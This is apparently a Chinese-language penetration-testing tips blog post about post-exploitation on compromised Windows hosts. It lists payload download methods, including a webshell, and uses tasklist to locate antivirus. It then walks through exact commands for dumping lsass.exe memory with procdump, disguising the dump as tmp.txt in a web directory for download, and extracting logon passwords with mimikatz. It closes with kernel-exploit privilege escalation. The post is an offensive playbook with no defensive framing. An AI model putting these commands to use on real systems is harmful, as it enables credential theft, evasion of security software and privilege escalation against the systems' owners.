windows渗透技巧

文章目录

  • 一,命令行下载方法
  • 二,搜索指定文件路径和 ☞dir
  • 三,查看进程的方法 ☞tasklist
  • 四,绕过杀软,离线读密码
  • 五,使用windows-kernel-exploits脚本提权

一,命令行下载方法

	1. powershell下载
	2. ftp
	3. 写脚本(马),菜刀连接
	4. bitsadmin
	5. certutil


二,搜索指定文件路径和 ☞dir

dir /b /s XXXX

cd /d E: && dir /b /s XXXXX 指定在E盘搜索

/b    使用空格式(没有标题信息或摘要)

/s    显示指定目录和所有子目录中的文件

windows渗透技巧_第1张图片


三,查看进程的方法 ☞tasklist

tasklist

/svc :无间断地列出每个过程的所有服务信息

windows渗透技巧_第2张图片

  • 寻找杀软
  • 寻找可利用的第三方

四,绕过杀软,离线读密码

由于杀软的存在,使得一些类似激活guest,添加用户的命令和mimikatz上传不能正常执行。

【解决】

采用procdump导出lsass.dmp,然后从web下载到本地,再使用mimikatz离线读密码绕过

  • procdump是微软官方抓取信息工具
  • lsass.dmp 是内存文进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到

【将lsass.dmp导出到哪】

目的是离线读,自然是导出到web目录下, 才能下载到本地喽
		①用dir找到网站目录
					cd /d E: && dir /b /s Logon.aspx|php’
		②copy到该目录
					copy lsass.dmp “E:\Program Files\Web\tmp.txt”

【步骤】

	1. 下载procdump工具
	2. 导出lsass.dmp
			procdump64.exe -accepteula -ma lsass.exe lsass.dmp	
	
	3. 找到web目录,将lsass.dmp 移动到该目录。并下载到本地
	4. 使用mimikatz读取密码
		      mimikatz.exe "sekurlsa::minidump lsass.txt" "sekurlsa::logonPasswords full" exit

相关网站


五,使用windows-kernel-exploits脚本提权

提权枚举脚本使用说明

由SecWiki 大神搞的项目

    1. getshell后 systeminfo查看补丁信息
    2. 本地使用windows-kernel-exploits,进行匹配
	3. 根据匹配的信息在secwiki的项目中找到如何利用的方式。

你可能感兴趣的:(渗透测试)